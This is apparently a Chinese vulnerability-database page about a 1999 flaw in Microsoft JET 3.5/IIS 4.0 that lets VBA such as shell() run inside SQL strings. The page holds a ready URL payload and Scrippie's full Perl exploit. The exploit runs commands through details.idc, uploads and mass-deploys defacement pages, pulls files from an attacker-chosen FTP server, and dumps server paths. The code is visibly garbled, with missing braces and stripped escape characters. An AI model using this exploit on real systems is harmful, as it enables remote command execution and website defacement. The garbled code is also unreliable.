Microsoft IIS 4.0 / Microsoft JET 3.5/3.5.1 Database Engine – VBA

Microsoft IIS 4.0 / Microsoft JET 3.5/3.5.1 Database Engine – VBA

漏洞ID 1053396 漏洞类型
发布时间 1999-05-25 更新时间 1999-05-25
图片[1]-Microsoft IIS 4.0 / Microsoft JET 3.5/3.5.1 Database Engine – VBA-安全小百科CVE编号 N/A
图片[2]-Microsoft IIS 4.0 / Microsoft JET 3.5/3.5.1 Database Engine – VBA-安全小百科CNNVD-ID N/A
漏洞平台 Multiple CVSS评分 N/A

Microsoft's JET database engine feature allows the embedding of Visual Basic for Application in SQL string expressions and the lack of metacharacter filtering by many web applications may allow remote users to execute commands on the system.

Microsoft's JET database engine (the core of Microsoft Access) allows the embedding of Visual Basic for Application expressions in SQL strings. VBA expressions withing two "|" characters within an SQL string will be executed and its result substituted in the string. The VBA code is evaluated in an expression context. That means you cannot make use of statements.

The Microsoft JET database engine can be used via the ODBC API. It is commonly used as a backend for web enabled applications. The fact that it uses the "|" character to execute VBA code within SQL statements in JET is a largely unknown feature, meaning that few applications escape user input for this metacharacter. Therefore any script or application that uses Microsoft's JET ODBC DSN could potentially be exploited.

Microsoft's IIS in particular executes ODBC commands in the context of the System account. This may allow remote attackers to input VBA code in web enabled applications that will be executed by IIS as the System user.

The most dangerous VBA command available to an attacker is shell(), which enables it to run any command in the system.

Microsoft's IIS 4.0 ships with a number of sample scripts that are vulnerable if used with the JET ODBC driver (e.g. details.idc). It also ships with MSADC which allows remote uses to execute SQL queries on a DNS via HTTP.

Tests seem to indicate JET 4.0 is not vulnerable to this issue. 

This exploit uses an ASP sample page (catalog_type.asp). It lets you execute shell comands like the other scripts. It is an Active Server Page so it runs the query as a local user and doesn't need any type of Remote Data Service to access the DSN. It just requires the default DSN (advworks) set.

http: //server/AdvWorks/equipment/catalog_type.asp?ProductType=|shell("cmd+/c+dir+c:")|

Scrippie <> has released the following exploit: 

# NewDSN.exe/CTGuestB.idc/Details.idc exploit by Scrippie/ #
	# Fuck JP # Version 1.3 # Fuck Meinel #
# Part of this source has been ripped from RFP #
# Exploit idea also by RFP                     ######################
# Much love to: Maja, Dopey, Hester            #                    #
# Cheers to:                        #  Maja, I love you  #
################################################                    #
# Things added/fixed since version 1.0         ################################
# - Forced Command Mode                        # Mail me at: #
# - Easy uploading of .html files              ################################
# - Checking for .idc files fixed                                             #
# - Output of hard path dumps has been cleaned up                             #
# Things added/fixed since version 1.1                                     # 
# - Mass deface option (coded to please my valentine :)                    #
# - Fixed some more bugs in .idc recognition (I'm a moron)                 #
# - Cleaned up hard path output some more                                  #
# Things added/fixed since version 1.2                  #
# - Uploading of files via ftp added :)                 #
# - Now uses chr() to make sure all chars can be echoed #
# ToDo                             #
# <Xphere> gebruik ord( liever     #
# <Xphere> gebruik ord() liever    #
# <Xphere> #weeh = ord($char);     #
# <Xphere> $weeh = ord($char);     #
# <Xphere> krijg je nummer         #

use Socket;
use Getopt::Std;

getopts("wcdh:u:fm:g:", %args);

print("NewDSN exploit v 1.2 -- Scrippie / Phreak.nlnn");
if (!defined $args{h}) {
print("Usage: -h <host>n");
print("t-c                      = create a new M$ Access DSN (Web SQL)n");
print("t-d                      = dump hard path by using several flawsn");
print("t-f                      = Force command (skip checks for .idc's)n");
print("t-g <server:filename>    = Upload file to NT box via FTPn");
print("t-h <host>               = host you want to scan (ip or domain)n");
print("t-u <filename>           = Upload HTML file (easy defacing)n");
print("t-w                      = Win 95 supportn");
print("t-m <dir /s /b file>     = Mass deface (see documentation)n");
exit; }

$host = $args{h};
$target = inet_aton($host) || die("inet_aton problems; host doesn't exist?");

if(defined $args{d}) {
   print("* [ Trying to get the hard path with the .idc flaw ] *nn   ");
   $temp = &idc_bug;
   if($temp ne "") { print $temp; }
      else { print "Failed..."; }
   print("nn* [ Trying to get the hard path with the .ida flaw ] *nn   ");
   $temp = &ida_bug;
   if($temp ne "") { print $temp; }
      else { print "Failed..."; }
   print("nn* [ Trying to get the hard path with the .pl flaw ] *nn   ");
   $temp = &pl_bug;
   if($temp ne "") { print("$tempn"); }
     else { print "Failed...n"; }

if(defined $args{g}) {

if(defined $args{u}) {
   open(HTMLFILE, "<" . $args{u}) or die "Cannot open $args{u}: $!n";
   print("* Now uploading: $args{u} to C:\phreak.htm on $args{h}n  ");
   while(<HTMLFILE>) {

      s/([<^>])/^$1/g;		# Escape using the WinNT ^ escape char
      s/([x0Dx0A])//g;        # Filter r, n chars
      s/|/^|chr(124)|/g;  # Convert | chars
      s/"/^|chr(34)|/g;   # Convert " chars
      s/&/^|chr(38)|/g;   # Convert & chars

      if($_ ne "") {
         $upcmd = "cmd /c echo " . $_ . " >> C:\phreak.htm";

if(defined $args{m}) {

if(defined $args{c}) {

   if(!defined $args{f}) {
      print("* [Checking for necessary files] *nn");
   else { print("* Forced command mode on - Skipping checksn"); }

   print("n* Now trying to create "Web SQL" DSN... ");
   if(&make_dsn == 0) { print("<failed> *n"); exit; }
      else { print("<success> *n"); }

   print("nInitializing GuestBook by GETting ctguestb.idcn");
else {
   if(!defined $args{f}) {
      print("Checking for: details.idct-- ");
      if(&check_details == 0) { print("Not Found :(n"); exit; }
         else { print("Found :)n"); }
   else { print("* Forced command mode on - Skipping checksn"); }

if (defined $args{w}) { $comm="command /c"; } else { $comm="cmd /c"; }

print("nType the command line you want to run ($comm assumed):n");
print("$comm ");

chomp $in;
$command="$comm " . $in ;


# Execute $command using details.idc #
sub exec_cmd {
my ($command) = @_;
$command =~ s/s/+/g;	# Convert spaces to plusses (%20 will also work)

sendraw("GET /scripts/samples/details.idc?Fname=hi&Lname=|shell("$command")|"
      . " HTTP/1.0nn");

# Upload a .bat file for mass defacing :) #
sub list_deface_bat {
my ($dir_file) = @_;
open(DIRFILE, $dir_file) or die "Cannot open $args{m}: $!n";
print("--- Go and have a beer - this will take a whilenn");
while(<DIRFILE>) {
 s/([x0Ax0D])//; # Yes, I dislike chop() - it doesn't cope with rn newlines
		   # in a *nix environment

 if(/index.htm/ || /index.asp/ || /default.htm/ || /default.asp/ ||
    /home.htm/ || /home.asp/ || /main.htm/ || /main.asp/ || /inhoud.htm/
    || /inhoud.asp/ || /index.stm/) {

    print("    Adding $_ to our mass deface batch filen");
    &exec_cmd("cmd /c echo copy C:\phreak.htm $_ >> c:\phjear.bat");

  print("n* Behave and don't run C:\phjear.bat You Filthy ScR|pT K1dx0r!n");
  print("  Oh, did you know this stuff is VERY easy to spot in the logs? *grin*n");

# Get file via ftp -s: #
sub upload_file {
   my ($foobar) = @_;
   $foobar =~ /(S+):(S+)/;

   print("* Uploading ftp script...n");

   &exec_cmd("cmd /c echo anonymous> C:\hello.txt");
   &exec_cmd("cmd /c echo>> C:\hello.txt");
   &exec_cmd("cmd /c echo get $2>> C:\hello.txt");
   &exec_cmd("cmd /c ftp -s:C:\hello.txt $1");

   print("* Fetching file - it can be found in: C:\WINNT\SYSTEM32\$2n");


# Initialize the new DSN by GETting ctguestb.idc #

sub init_gb {
my @results=sendraw("GET /scripts/samples/ctguestb.idc HTTP/1.0nn");
return 0;

# Checks if exists #

sub check_newdsn {
my @results=sendraw("GET /scripts/tools/newdsn.exe HTTP/1.0nn");
$results[0]=~m#HTTP/([0-9.]+) ([0-9]+) ([^n]*)#;
return 1 if $2 eq "200";
return 0;

# .idc's are funny...return codes are:                              #
# 200 OK if they exist and DSN is made                              #
# 500 Error performing query if they exist and DSN is NOT made      #
# 200 Error performing query if they don't exist                    #
# Information provided by RFP's whisker                             #
# Checks if exists #

sub check_ctguestb {
my @results=sendraw("GET /scripts/samples/ctguestb.idc HTTP/1.0nn");
$results[0]=~m#HTTP/([0-9.]+) ([0-9]+) (S+) ([^nr]*)#;
if ($2 eq "500" || ($2 eq "200" && $3 eq "OK")) { return 1; }
return 0;

# Checks if exists #

sub check_details {
my @results=sendraw("GET /scripts/samples/details.idc HTTP/1.0nn");
$results[0]=~m#HTTP/([0-9.]+) ([0-9]+) ([^rn]*)#;
if ($2 eq "500" || ($2 eq "200" && $3 eq "OK")) { return 1; }
return 0;

# Checks out if newdsn.exe, ctguestb.idc and details.idc are present #

sub check_cgis {
print("tChecking for: newdsn.exet-- ");
if(&check_newdsn == 0) { print("Not Found :(n"); exit; }
else { print("Found :)n"); }
print("tChecking for: ctguestb.idct-- ");
if(&check_ctguestb == 0) { print("Not Found :(n"); exit; }
else { print("Found :)n"); }
print("tChecking for: details.idct-- "); 
if(&check_details == 0) { print("Not Found :(n"); exit; }
else { print("Found :)n"); }

# Make a DSN with the name of "Web SQL" #

sub make_dsn {
my @results=sendraw("GET /scripts/tools/newdsn.exe?driver=Microsoft%2B" .
        "Access%2BDriver%2B%28*.mdb%29&dsn=Web%20SQL&dbq=" .
	"C%3A%5Cfoobar.mdb&newdb=CREATE_DB&attr= HTTP/1.0nn");
$results[0]=~m#HTTP/([0-9.]+) ([0-9]+) ([^n]*)#;
if($2 eq "200") {
  foreach $line (@results) {
    return 1 if $line=~/<H2>Datasource creation successful</H2>/;}}
 return 0;}

# Use .idc flaw to get absolute path #

sub idc_bug {
my @results=sendraw("GET /blaat.idc HTTP/1.0nn");
@results=grep(/[A-Z]:\S*/, @results);
$results[0] =~ /([A-Z]:\S*)blaat.idc/;
return $1;

# Use .ida flaw to get absolute path #

sub ida_bug {
my @results=sendraw("GET /blaat.ida HTTP/1.0nn");
@results=grep(/([A-Z]:\S*)/, @results);
$results[0] =~ /([A-Z]:\S*)blaat.ida/;
return $1;

# Use .pl flaw to get absolute path #

sub pl_bug {
my @results=sendraw("GET / HTTP/1.0nn");
$results[0] =~ /([A-Z]:\S*);
return $1;

# Encode data in HTTPd style #

sub hex_encode {
   my ($stringz) = @_;

   foreach $char (@stringz)
      printf("%lx", $char[0]);

# Send data over a TCP port 80 connection to $target #

sub sendraw {   # this saves the whole transaction anyway
        my ($pstr)=@_;
        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                die("Socket problemsn");
        if(connect(S,pack "SnA4x8",2,80,$target)){
                my @in;
                select(S);      $|=1;   print $pstr;
                while(<S>){ push @in, $_;
                        print STDOUT "." if(defined $args{X});}
                select(STDOUT); close(S); return @in;
        } else { die("Can't connect...n"); }

相关推荐: SLMail 3.0.2421 Buffer Overflow ‘Mail From’ Vulnerability

SLMail 3.0.2421 Buffer Overflow ‘Mail From’ Vulnerability 漏洞ID 1104895 漏洞类型 Boundary Condition Error 发布时间 1998-07-09 更新时间 1998-07-…

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Life must be lived with love, happiness, and dreams.